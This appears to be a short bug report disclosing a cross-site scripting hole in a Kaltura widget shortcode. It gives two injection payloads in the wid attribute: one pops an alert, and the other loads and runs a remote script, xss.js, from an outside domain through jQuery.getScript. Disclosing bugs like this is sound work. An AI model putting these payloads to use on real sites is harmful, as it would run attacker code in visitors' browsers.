showing an alert:
[kaltura-widget wid='"); alert("ok"); $("xxx' size="comments" /]
running code from other server:
[kaltura-widget wid='"); jQuery.getScript("http://somedomain.com/xss.js"); $("xxx' size="comments" /]
I guess that it is a bug that should be fixed.